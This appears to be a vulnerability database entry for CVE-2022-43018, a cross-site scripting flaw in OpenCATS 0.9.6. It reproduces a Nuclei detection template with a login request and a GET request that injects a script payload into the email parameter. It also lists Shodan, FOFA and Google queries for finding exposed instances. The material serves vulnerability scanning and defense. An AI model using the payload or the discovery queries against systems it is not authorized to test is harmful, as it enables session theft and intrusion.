Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-43018
HistoryOct 24, 2022 - 12:50 p.m.

OpenCATS 0.9.6 - Cross-Site Scripting

2022-10-2412:50:28
ProjectDiscovery
github.com
2
opencats
cross-site scripting
vulnerability
authenticated
cve2022
cvss
email parameter

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

37.9%

OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the email parameter in the Check Email function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
id: CVE-2022-43018

info:
  name: OpenCATS 0.9.6 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the email parameter in the Check Email function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  remediation: |
    Upgrade to a patched version of OpenCATS or apply the necessary security patches provided by the vendor.
  reference:
    - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_checkEmail.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-43018
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Henry4E36/POCS
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-43018
    cwe-id: CWE-79
    epss-score: 0.00088
    epss-percentile: 0.37623
    cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: opencats
    product: opencats
    shodan-query:
      - title:"OpenCATS"
      - http.title:"opencats"
    fofa-query: title="opencats"
    google-query: intitle:"opencats"
  tags: cve,cve2022,xss,opencats,authenticated

http:
  - raw:
      - |
        POST /index.php?m=login&a=attemptLogin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}
      - |
        GET /index.php?m=toolbar&callback=abcd&a=checkEmailIsInSystem&email=</script><script>alert(document.domain)</script> HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>:0'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502203f51202bd643ea3d23ea6af2a9c6a1323d06dce6ea0497c0c45cac707ed1bb07022100d1284e3a5c79d32d2a4508e11676fd2d3f17053deece04191d43383a0d9056d2:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

37.9%

Related for NUCLEI:CVE-2022-43018